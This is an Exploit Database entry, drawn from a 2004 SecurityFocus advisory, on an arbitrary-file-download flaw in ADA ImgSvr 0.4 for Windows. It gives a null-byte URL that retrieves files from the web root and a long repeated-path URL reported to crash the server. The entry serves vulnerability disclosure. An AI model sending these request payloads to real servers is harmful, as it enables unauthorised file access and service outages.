ADA IMGSVR 0.4 - Arbitrary File Download

EDB-ID:

23906


Platform:

Windows

Published:

2004-04-01

source: http://www.securityfocus.com/bid/10027/info

A vulnerability has been reported in the ImgSvr server software that may allow a remote user to the retrieve arbitrary files from the web server root directory and any subdirectories therein.

An attacker may leverage this issue to gain access to arbitrary scripts contained within the server root directory. 

http://www.example.org:1234/someDirectory/fileName%00

The following has been reported to crash the affected server:
http://127.0.0.1:1234/%00/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/